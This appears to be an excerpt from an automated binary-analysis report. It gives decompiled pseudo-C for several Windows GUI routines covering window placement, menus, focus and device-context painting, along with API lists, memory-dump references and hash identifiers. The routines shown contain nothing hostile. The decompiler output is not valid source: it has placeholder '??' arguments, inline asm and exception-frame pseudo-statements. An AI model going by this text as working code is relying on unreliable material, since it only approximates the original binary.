    • GetWindowLongA.USER32(?,000000F0), ref: 004328CB
    • GetWindowLongA.USER32(?,000000F8), ref: 004328E0
    • ScreenToClient.USER32(00000000), ref: 004328ED
    • ScreenToClient.USER32(00000000,?), ref: 004328F8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Window$ClientLongScreen$IconicPlacementRect
    • String ID: ,
    • API String ID: 2266315723-3772416878
    • Opcode ID: 6e5cd744639d8d7ccc808a1d290235ba1e55158d8b2adbc38bcc9d0976e4c0cd
    • Instruction ID: f98955ee0371010510501b7f5a39e29b8fbc353eb4e0254aa9676f90055cba17
    • Opcode Fuzzy Hash: 6e5cd744639d8d7ccc808a1d290235ba1e55158d8b2adbc38bcc9d0976e4c0cd
    • Instruction Fuzzy Hash: 6A117C72501201AFCB01EF6DC881E9B77E8AF0C314F04463AFD58DB286DB39D9048BA6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0043F83C(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
    				intOrPtr _v8;
    				struct HMENU__* _v12;
    				signed int _v16;
    				char _v17;
    				intOrPtr _v24;
    				int _v28;
    				struct HDC__* _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr* _v48;
    				char _v52;
    				intOrPtr _t137;
    				signed int _t138;
    				intOrPtr _t144;
    				signed int _t150;
    				signed int _t151;
    				intOrPtr* _t153;
    				void* _t158;
    				struct HMENU__* _t160;
    				intOrPtr* _t165;
    				void* _t173;
    				signed int _t177;
    				signed int _t181;
    				void* _t182;
    				void* _t214;
    				struct HDC__* _t221;
    				void* _t251;
    				signed int _t257;
    				void* _t265;
    				signed int _t271;
    				signed int _t272;
    				signed int _t274;
    				signed int _t275;
    				signed int _t277;
    				signed int _t278;
    				signed int _t280;
    				signed int _t281;
    				signed int _t283;
    				signed int _t284;
    				signed int _t286;
    				signed int _t287;
    				signed int _t290;
    				signed int _t291;
    				intOrPtr _t311;
    				intOrPtr _t333;
    				intOrPtr _t342;
    				intOrPtr _t346;
    				intOrPtr* _t353;
    				signed int _t355;
    				intOrPtr* _t356;
    				signed int _t367;
    				signed int _t368;
    				signed int _t369;
    				signed int _t370;
    				signed int _t371;
    				signed int _t372;
    				signed int _t373;
    				intOrPtr* _t375;
    				void* _t377;
    				void* _t378;
    				intOrPtr _t379;
    				void* _t380;
    
    				_t377 = _t378;
    				_t379 = _t378 + 0xffffffd0;
    				_v52 = 0;
    				_t375 = __edx;
    				_v8 = __eax;
    				_push(_t377);
    				_push(0x43fd6f);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t379;
    				_t137 =  *__edx;
    				_t380 = _t137 - 0x111;
    				if(_t380 > 0) {
    					_t138 = _t137 - 0x117;
    					__eflags = _t138;
    					if(_t138 == 0) {
    						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
    						__eflags = _t271;
    						if(_t271 < 0) {
    							goto L67;
    						} else {
    							_t272 = _t271 + 1;
    							_t367 = 0;
    							__eflags = 0;
    							while(1) {
    								_t150 = E0043EBB8(E00413E68(_v8, _t367),  *(_t375 + 4), __eflags);
    								__eflags = _t150;
    								if(_t150 != 0) {
    									goto L68;
    								}
    								_t367 = _t367 + 1;
    								_t272 = _t272 - 1;
    								__eflags = _t272;
    								if(_t272 != 0) {
    									continue;
    								} else {
    									goto L67;
    								}
    								goto L68;
    							}
    						}
    					} else {
    						_t151 = _t138 - 8;
    						__eflags = _t151;
    						if(_t151 == 0) {
    							_v17 = 0;
    							__eflags =  *(__edx + 6) & 0x00000010;
    							if(( *(__edx + 6) & 0x00000010) != 0) {
    								_v17 = 1;
    							}
    							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
    							__eflags = _t274;
    							if(__eflags < 0) {
    								L32:
    								_t153 =  *0x479fc4; // 0x47bb9c
    								E0044BB78( *_t153, 0, __eflags);
    								goto L67;
    							} else {
    								_t275 = _t274 + 1;
    								_t368 = 0;
    								__eflags = 0;
    								while(1) {
    									__eflags = _v17 - 1;
    									if(_v17 != 1) {
    										_v12 =  *(_t375 + 4) & 0x0000ffff;
    									} else {
    										_t160 =  *(_t375 + 8);
    										__eflags = _t160;
    										if(_t160 == 0) {
    											_v12 = 0xffffffff;
    										} else {
    											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
    										}
    									}
    									_t158 = E00413E68(_v8, _t368);
    									_t295 = _v17;
    									_v16 = E0043EAFC(_t158, _v17, _v12);
    									__eflags = _v16;
    									if(__eflags != 0) {
    										break;
    									}
    									_t368 = _t368 + 1;
    									_t275 = _t275 - 1;
    									__eflags = _t275;
    									if(__eflags != 0) {
    										continue;
    									} else {
    										goto L32;
    									}
    									goto L68;
    								}
    								E004290BC( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
    								_t165 =  *0x479fc4; // 0x47bb9c
    								E0044BB78( *_t165, _v52, __eflags);
    							}
    						} else {
    							__eflags = _t151 == 1;
    							if(_t151 == 1) {
    								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
    								__eflags = _t277;
    								if(_t277 < 0) {
    									goto L67;
    								} else {
    									_t278 = _t277 + 1;
    									_t369 = 0;
    									__eflags = 0;
    									while(1) {
    										_v48 = E00413E68(_v8, _t369);
    										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
    										__eflags = _t173 -  *(_t375 + 8);
    										if(_t173 ==  *(_t375 + 8)) {
    											break;
    										}
    										_t177 = E0043EAFC(_v48, 1,  *(_t375 + 8));
    										__eflags = _t177;
    										if(_t177 == 0) {
    											_t369 = _t369 + 1;
    											_t278 = _t278 - 1;
    											__eflags = _t278;
    											if(_t278 != 0) {
    												continue;
    											} else {
    												goto L67;
    											}
    										} else {
    											break;
    										}
    										goto L68;
    									}
    									E0043F42C(_v48, _t375);
    								}
    							} else {
    								goto L67;
    							}
    						}
    					}
    					goto L68;
    				} else {
    					if(_t380 == 0) {
    						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
    						__eflags = _t280;
    						if(_t280 < 0) {
    							goto L67;
    						} else {
    							_t281 = _t280 + 1;
    							_t370 = 0;
    							__eflags = 0;
    							while(1) {
    								E00413E68(_v8, _t370);
    								_t181 = E0043EB9C( *(_t375 + 4), __eflags);
    								__eflags = _t181;
    								if(_t181 != 0) {
    									goto L68;
    								}
    								_t370 = _t370 + 1;
    								_t281 = _t281 - 1;
    								__eflags = _t281;
    								if(_t281 != 0) {
    									continue;
    								} else {
    									goto L67;
    								}
    								goto L68;
    							}
    						}
    						goto L68;
    					} else {
    						_t182 = _t137 - 0x2b;
    						if(_t182 == 0) {
    							_v40 =  *((intOrPtr*)(__edx + 8));
    							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
    							__eflags = _t283;
    							if(_t283 < 0) {
    								goto L67;
    							} else {
    								_t284 = _t283 + 1;
    								_t371 = 0;
    								__eflags = 0;
    								while(1) {
    									_v16 = E0043EAFC(E00413E68(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
    									__eflags = _v16;
    									if(_v16 != 0) {
    										break;
    									}
    									_t371 = _t371 + 1;
    									_t284 = _t284 - 1;
    									__eflags = _t284;
    									if(_t284 != 0) {
    										continue;
    									} else {
    										goto L67;
    									}
    									goto L69;
    								}
    								_v24 = E0041D184(0, 1);
    								_push(_t377);
    								_push(0x43fba2);
    								_push( *[fs:eax]);
    								 *[fs:eax] = _t379;
    								_v28 = SaveDC( *(_v40 + 0x18));
    								_push(_t377);
    								_push(0x43fb85);
    								_push( *[fs:eax]);
    								 *[fs:eax] = _t379;
    								E0041D740(_v24,  *(_v40 + 0x18));
    								E0041D5E0(_v24);
    								E00440014(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
    								_pop(_t333);
    								 *[fs:eax] = _t333;
    								_push(0x43fb8c);
    								__eflags = 0;
    								E0041D740(_v24, 0);
    								return RestoreDC( *(_v40 + 0x18), _v28);
    							}
    						} else {
    							_t214 = _t182 - 1;
    							if(_t214 == 0) {
    								_v44 =  *((intOrPtr*)(__edx + 8));
    								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
    								__eflags = _t286;
    								if(_t286 < 0) {
    									goto L67;
    								} else {
    									_t287 = _t286 + 1;
    									_t372 = 0;
    									__eflags = 0;
    									while(1) {
    										_v16 = E0043EAFC(E00413E68(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
    										__eflags = _v16;
    										if(_v16 != 0) {
    											break;
    										}
    										_t372 = _t372 + 1;
    										_t287 = _t287 - 1;
    										__eflags = _t287;
    										if(_t287 != 0) {
    											continue;
    										} else {
    											goto L67;
    										}
    										goto L69;
    									}
    									_t221 =  *((intOrPtr*)(_v8 + 0x10));
    									L00406874();
    									_v32 = _t221;
    									 *[fs:eax] = _t379;
    									_v24 = E0041D184(0, 1);
    									 *[fs:eax] = _t379;
    									_v28 = SaveDC(_v32);
    									 *[fs:eax] = _t379;
    									E0041D740(_v24, _v32);
    									E0041D5E0(_v24);
    									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x43fca3, _t377,  *[fs:eax], 0x43fcc0, _t377,  *[fs:eax], 0x43fce5, _t377, _t221);
    									_pop(_t342);
    									 *[fs:eax] = _t342;
    									_push(0x43fcaa);
    									__eflags = 0;
    									E0041D740(_v24, 0);
    									return RestoreDC(_v32, _v28);
    								}
    							} else {
    								if(_t214 == 0x27) {
    									_v36 =  *((intOrPtr*)(__edx + 8));
    									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
    									__eflags = _t290;
    									if(_t290 < 0) {
    										goto L67;
    									} else {
    										_t291 = _t290 + 1;
    										_t373 = 0;
    										__eflags = 0;
    										while(1) {
    											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E00413E68(_v8, _t373))) + 0x34))();
    											_t346 = _v36;
    											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
    											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
    												_v16 = E0043EAFC(E00413E68(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
    											} else {
    												_v16 =  *((intOrPtr*)(E00413E68(_v8, _t373) + 0x34));
    											}
    											__eflags = _v16;
    											if(_v16 != 0) {
    												break;
    											}
    											_t373 = _t373 + 1;
    											_t291 = _t291 - 1;
    											__eflags = _t291;
    											if(_t291 != 0) {
    												continue;
    											} else {
    												goto L67;
    											}
    											goto L68;
    										}
    										_t257 = E0043EB2C(E00413E68(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
    										__eflags = _t257;
    										if(_t257 == 0) {
    											_t265 = E00413E68(_v8, _t373);
    											__eflags = 0;
    											_t257 = E0043EB2C(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
    										}
    										_t353 =  *0x47a0fc; // 0x47bba0
    										_t56 =  *_t353 + 0x6c; // 0x0
    										_t355 =  *_t56;
    										__eflags = _t355;
    										if(_t355 != 0) {
    											__eflags = _t257;
    											if(_t257 == 0) {
    												_t257 =  *(_t355 + 0x158);
    											}
    											__eflags =  *(_t355 + 0x228) & 0x00000008;
    											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
    												_t356 =  *0x479fc4; // 0x47bb9c
    												E0044B7FC( *_t356, _t291, _t257, _t373, _t375);
    											} else {
    												E0044B884();
    											}
    										}
    									}
    								} else {
    									L67:
    									_push( *(_t375 + 8));
    									_push( *(_t375 + 4));
    									_push( *_t375);
    									_t144 =  *((intOrPtr*)(_v8 + 0x10));
    									_push(_t144);
    									L0040668C();
    									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
    								}
    								L68:
    								_pop(_t311);
    								 *[fs:eax] = _t311;
    								_push(0x43fd76);
    								return E004041E0( &_v52);
    							}
    						}
    					}
    				}
    				L69:
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: RestoreSave$NtdllProc_Window
    • String ID:
    • API String ID: 2725519021-0
    • Opcode ID: 11c90f6c02996e9a34e51eb691b7c6824ddf5cdce80ccbf55f2a12286eaf901f
    • Instruction ID: 2b1ceaca304b7cde617366fa2980bf74fb0026d1a4822ac40b68014f7ef95906
    • Opcode Fuzzy Hash: 11c90f6c02996e9a34e51eb691b7c6824ddf5cdce80ccbf55f2a12286eaf901f
    • Instruction Fuzzy Hash: 22E12A74A002099FCB14EF6AC485A9EB7F5FF4C304F21956AE805A7761C638ED46CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 38%
    			E0044ADC0(void* __eax) {
    				struct HWND__* _t21;
    				intOrPtr* _t26;
    				signed int _t29;
    				intOrPtr* _t30;
    				int _t33;
    				intOrPtr _t36;
    				void* _t51;
    				int _t60;
    
    				_t51 = __eax;
    				_t21 = IsIconic( *(__eax + 0x30));
    				if(_t21 != 0) {
    					SetActiveWindow( *(_t51 + 0x30));
    					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
    						L6:
    						E00449D18( *(_t51 + 0x30), 9, __eflags);
    					} else {
    						_t60 = IsWindowEnabled(E0043260C( *((intOrPtr*)(_t51 + 0x44))));
    						if(_t60 == 0) {
    							goto L6;
    						} else {
    							_push(0);
    							_push(0xf120);
    							_push(0x112);
    							_push( *(_t51 + 0x30));
    							L0040668C();
    						}
    					}
    					_t26 =  *0x479e84; // 0x47b910
    					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
    					if(_t60 < 0) {
    						asm("adc eax, 0x0");
    					}
    					_t30 =  *0x479e84; // 0x47b910
    					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
    					if(_t60 < 0) {
    						asm("adc eax, 0x0");
    					}
    					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
    					_t36 =  *((intOrPtr*)(_t51 + 0x44));
    					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
    						E004459F0(_t36, 0);
    						E00447E14( *((intOrPtr*)(_t51 + 0x44)));
    					}
    					E0044A40C(_t51);
    					_t21 =  *0x47bba0; // 0x2321310
    					_t15 = _t21 + 0x64; // 0x0
    					_t55 =  *_t15;
    					if( *_t15 != 0) {
    						_t21 = SetFocus(E0043260C(_t55));
    					}
    					if( *((short*)(_t51 + 0x122)) != 0) {
    						return  *((intOrPtr*)(_t51 + 0x120))();
    					}
    				}
    				return _t21;
    			}

    APIs
    • IsIconic.USER32(?), ref: 0044ADC8
    • SetActiveWindow.USER32(?,?,?,?,0044A7ED,00000000,0044ACAB), ref: 0044ADD9
    • IsWindowEnabled.USER32(00000000), ref: 0044ADFC
    • NtdllDefWindowProc_A.NTDLL(?,00000112,0000F120,00000000,00000000,?,?,?,?,0044A7ED,00000000,0044ACAB), ref: 0044AE15
    • SetWindowPos.USER32(?,00000000,00000000,?,?,0044A7ED,00000000,0044ACAB), ref: 0044AE5B
    • SetFocus.USER32(00000000,?,00000000,00000000,?,?,0044A7ED,00000000,0044ACAB), ref: 0044AEA0
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
    • String ID:
    • API String ID: 3996302123-0
    • Opcode ID: a18e5910c5b1de6d2910ce6abcd8df4b9d6cfa4e70dc6f101cacd80208305458
    • Instruction ID: 09b234ad3082483ebd828ff1cb0b2d1dbf2587af6458b002df5a589e96624a01
    • Opcode Fuzzy Hash: a18e5910c5b1de6d2910ce6abcd8df4b9d6cfa4e70dc6f101cacd80208305458
    • Instruction Fuzzy Hash: 633121717802409BFB10EB69CD86B563798AF08704F1804AABA14DF2D7D67DEC64875E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00431FF8(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
    				void* _v20;
    				struct _WINDOWPLACEMENT _v48;
    				char _v64;
    				void* _t31;
    				int _t45;
    				int _t51;
    				void* _t52;
    				int _t56;
    				int _t58;
    
    				_t56 = __ecx;
    				_t58 = __edx;
    				_t52 = __eax;
    				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
    					L4:
    					if(E0043286C(_t52) == 0) {
    						L7:
    						 *(_t52 + 0x40) = _t58;
    						 *(_t52 + 0x44) = _t56;
    						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
    						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
    						_t31 = E0043286C(_t52);
    						__eflags = _t31;
    						if(_t31 != 0) {
    							_v48.length = 0x2c;
    							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
    							E0042B8F8(_t52,  &_v64);
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
    						}
    						L9:
    						E0042B5AC(_t52);
    						return E00403674(_t52, _t66);
    					}
    					_t45 = IsIconic( *(_t52 + 0x180));
    					_t66 = _t45;
    					if(_t45 != 0) {
    						goto L7;
    					}
    					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
    					goto L9;
    				} else {
    					_t51 = _a4;
    					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
    						return _t51;
    					}
    					goto L4;
    				}
    			}

    APIs
    • IsIconic.USER32(?), ref: 00432037
    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00432055
    • GetWindowPlacement.USER32(?,0000002C), ref: 0043208B
    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 004320AF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Window$Placement$Iconic
    • String ID: ,
    • API String ID: 568898626-3772416878
    • Opcode ID: aae737d8b8d5e18feef5c1e7b7c71cb3ea7ab689b8d9494d497e435d334c8786
    • Instruction ID: f4f626083127390298c72cc44398af9856f059a5743414f4a400364393e0e9ff
    • Opcode Fuzzy Hash: aae737d8b8d5e18feef5c1e7b7c71cb3ea7ab689b8d9494d497e435d334c8786
    • Instruction Fuzzy Hash: 2A214171600204ABCF18EF69C9C099A77B8AF0D314F049466FE18EF346D675D908CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00444A1C(intOrPtr __eax, struct HWND__** __edx) {
    				intOrPtr _v8;
    				int _v12;
    				intOrPtr _v16;
    				struct HDC__* _v20;
    				struct HWND__* _v24;
    				void* __ebp;
    				struct HWND__* _t92;
    				intOrPtr _t112;
    				intOrPtr _t115;
    				struct HWND__* _t121;
    				struct HWND__* _t124;
    				intOrPtr _t128;
    				struct HWND__* _t129;
    				intOrPtr _t130;
    				intOrPtr _t131;
    				struct HWND__* _t133;
    				struct HWND__* _t136;
    				intOrPtr _t142;
    				intOrPtr _t172;
    				struct HDC__* _t177;
    				struct HWND__** _t200;
    				struct HWND__* _t218;
    				struct HWND__* _t219;
    				intOrPtr _t228;
    				void* _t230;
    				void* _t231;
    				intOrPtr _t237;
    				intOrPtr _t245;
    				struct HWND__* _t249;
    				struct HWND__* _t250;
    				struct HWND__* _t255;
    				struct HWND__* _t256;
    				void* _t258;
    				void* _t260;
    				intOrPtr _t261;
    				void* _t263;
    				void* _t267;
    
    				_t258 = _t260;
    				_t261 = _t260 + 0xffffffec;
    				_t200 = __edx;
    				_v8 = __eax;
    				_t92 =  *__edx;
    				_t218 = _t92;
    				_t263 = _t218 - 0x46;
    				if(_t263 > 0) {
    					_t219 = _t218 - 0xb01a;
    					__eflags = _t219;
    					if(_t219 == 0) {
    						__eflags =  *(_v8 + 0xa0);
    						if(__eflags != 0) {
    							E00403674(_v8, __eflags);
    						}
    					} else {
    						__eflags = _t219 == 1;
    						if(_t219 == 1) {
    							__eflags =  *(_v8 + 0xa0);
    							if(__eflags != 0) {
    								E00403674(_v8, __eflags);
    							}
    						} else {
    							goto L41;
    						}
    					}
    					goto L43;
    				} else {
    					if(_t263 == 0) {
    						_t112 = _v8;
    						_t228 =  *0x444e50; // 0x1
    						__eflags = _t228 - ( *(_t112 + 0x1c) &  *0x444e4c);
    						if(_t228 == ( *(_t112 + 0x1c) &  *0x444e4c)) {
    							_t115 = _v8;
    							__eflags =  *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff;
    							if( *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff < 0) {
    								_t128 = _v8;
    								__eflags =  *((char*)(_t128 + 0x22b)) - 2;
    								if( *((char*)(_t128 + 0x22b)) != 2) {
    									_t129 = __edx[2];
    									_t26 = _t129 + 0x18;
    									 *_t26 =  *(_t129 + 0x18) | 0x00000002;
    									__eflags =  *_t26;
    								}
    							}
    							_t121 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
    							__eflags = _t121;
    							if(_t121 == 0) {
    								L30:
    								_t124 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
    								__eflags = _t124;
    								if(_t124 == 0) {
    									L32:
    									 *( *((intOrPtr*)(_t200 + 8)) + 0x18) =  *( *((intOrPtr*)(_t200 + 8)) + 0x18) | 0x00000001;
    								} else {
    									__eflags = _t124 == 3;
    									if(_t124 == 3) {
    										goto L32;
    									}
    								}
    							} else {
    								__eflags = _t121 == 2;
    								if(_t121 == 2) {
    									goto L30;
    								}
    							}
    						}
    						goto L43;
    					} else {
    						_t230 = _t218 + 0xfffffffa - 3;
    						if(_t230 < 0) {
    							__eflags =  *0x479ba8;
    							if( *0x479ba8 != 0) {
    								__eflags =  *__edx - 7;
    								if( *__edx != 7) {
    									goto L43;
    								} else {
    									_t130 = _v8;
    									__eflags =  *(_t130 + 0x1c) & 0x00000010;
    									if(( *(_t130 + 0x1c) & 0x00000010) != 0) {
    										goto L43;
    									} else {
    										_t255 = 0;
    										_t131 = _v8;
    										__eflags =  *((char*)(_t131 + 0x22f)) - 2;
    										if( *((char*)(_t131 + 0x22f)) != 2) {
    											_t133 =  *(_v8 + 0x220);
    											__eflags = _t133;
    											if(_t133 != 0) {
    												__eflags = _t133 - _v8;
    												if(_t133 != _v8) {
    													_t255 = E0043260C(_t133);
    												}
    											}
    										} else {
    											_t136 = E00445348(_v8);
    											__eflags = _t136;
    											if(_t136 != 0) {
    												_t255 = E0043260C(E00445348(_v8));
    											}
    										}
    										__eflags = _t255;
    										if(_t255 == 0) {
    											goto L43;
    										} else {
    											_t92 = SetFocus(_t255);
    										}
    									}
    								}
    							}
    							goto L44;
    						} else {
    							_t231 = _t230 - 0x22;
    							if(_t231 == 0) {
    								_v24 = __edx[2];
    								__eflags = _v24->i - 1;
    								if(_v24->i != 1) {
    									goto L43;
    								} else {
    									_t142 = _v8;
    									__eflags =  *(_t142 + 0x248);
    									if( *(_t142 + 0x248) == 0) {
    										goto L43;
    									} else {
    										_t249 = E0043EAFC( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
    										__eflags = _t249;
    										if(_t249 == 0) {
    											goto L43;
    										} else {
    											_v16 = E0041D184(0, 1);
    											_push(_t258);
    											_push(0x444c95);
    											_push( *[fs:eax]);
    											 *[fs:eax] = _t261;
    											_v12 = SaveDC( *(_v24 + 0x18));
    											_push(_t258);
    											_push(0x444c78);
    											_push( *[fs:eax]);
    											 *[fs:eax] = _t261;
    											E0041D740(_v16,  *(_v24 + 0x18));
    											E0041D5E0(_v16);
    											E00440014(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
    											_pop(_t237);
    											 *[fs:eax] = _t237;
    											_push(0x444c7f);
    											__eflags = 0;
    											E0041D740(_v16, 0);
    											return RestoreDC( *(_v24 + 0x18), _v12);
    										}
    									}
    								}
    							} else {
    								if(_t231 == 1) {
    									_t256 = __edx[2];
    									__eflags = _t256->i - 1;
    									if(_t256->i != 1) {
    										goto L43;
    									} else {
    										_t172 = _v8;
    										__eflags =  *(_t172 + 0x248);
    										if( *(_t172 + 0x248) == 0) {
    											goto L43;
    										} else {
    											_t250 = E0043EAFC( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
    											__eflags = _t250;
    											if(_t250 == 0) {
    												goto L43;
    											} else {
    												_t177 = E0043260C(_v8);
    												L00406874();
    												_v20 = _t177;
    												 *[fs:eax] = _t261;
    												_v16 = E0041D184(0, 1);
    												 *[fs:eax] = _t261;
    												_v12 = SaveDC(_v20);
    												 *[fs:eax] = _t261;
    												E0041D740(_v16, _v20);
    												E0041D5E0(_v16);
    												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x444d7f, _t258,  *[fs:eax], 0x444d9c, _t258,  *[fs:eax], 0x444dc3, _t258, _t177);
    												_pop(_t245);
    												 *[fs:eax] = _t245;
    												_push(0x444d86);
    												__eflags = 0;
    												E0041D740(_v16, 0);
    												return RestoreDC(_v20, _v12);
    											}
    										}
    									}
    								} else {
    									L41:
    									_t267 = _t92 -  *0x47bba8; // 0xc075
    									if(_t267 == 0) {
    										E0042D0C4(_v8, 0, 0xb025, 0);
    										E0042D0C4(_v8, 0, 0xb024, 0);
    										E0042D0C4(_v8, 0, 0xb035, 0);
    										E0042D0C4(_v8, 0, 0xb009, 0);
    										E0042D0C4(_v8, 0, 0xb008, 0);
    										E0042D0C4(_v8, 0, 0xb03d, 0);
    									}
    									L43:
    									_t92 = E00430020(_v8, _t200);
    									L44:
    									return _t92;
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: RestoreSave$Focus
    • String ID:
    • API String ID: 1675357626-0
    • Opcode ID: 6459d9a12d5297b45977446b9e8359c2b755e30534f2d9c0bcc8ae5443016906
    • Instruction ID: 5bd2a619aa4dd519aa99fe6b3c75e9308ac0c94b799b71adcf0a8c30c5240095
    • Opcode Fuzzy Hash: 6459d9a12d5297b45977446b9e8359c2b755e30534f2d9c0bcc8ae5443016906
    • Instruction Fuzzy Hash: 31B17175A00504AFDB15DF69C986BAEB3F5FF89304F6544A6E404A7361CB38EE42CB18
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E0044AD10(void* __eax) {
    				struct HWND__* _t21;
    				void* _t40;
    
    				_t40 = __eax;
    				_t21 = IsIconic( *(__eax + 0x30));
    				if(_t21 == 0) {
    					E0044A3FC();
    					SetActiveWindow( *(_t40 + 0x30));
    					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0043260C( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
    						_t21 = E00449D18( *(_t40 + 0x30), 6, __eflags);
    					} else {
    						_t43 =  *((intOrPtr*)(_t40 + 0x44));
    						SetWindowPos( *(_t40 + 0x30), E0043260C( *((intOrPtr*)(_t40 + 0x44))),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
    						_push(0);
    						_push(0xf020);
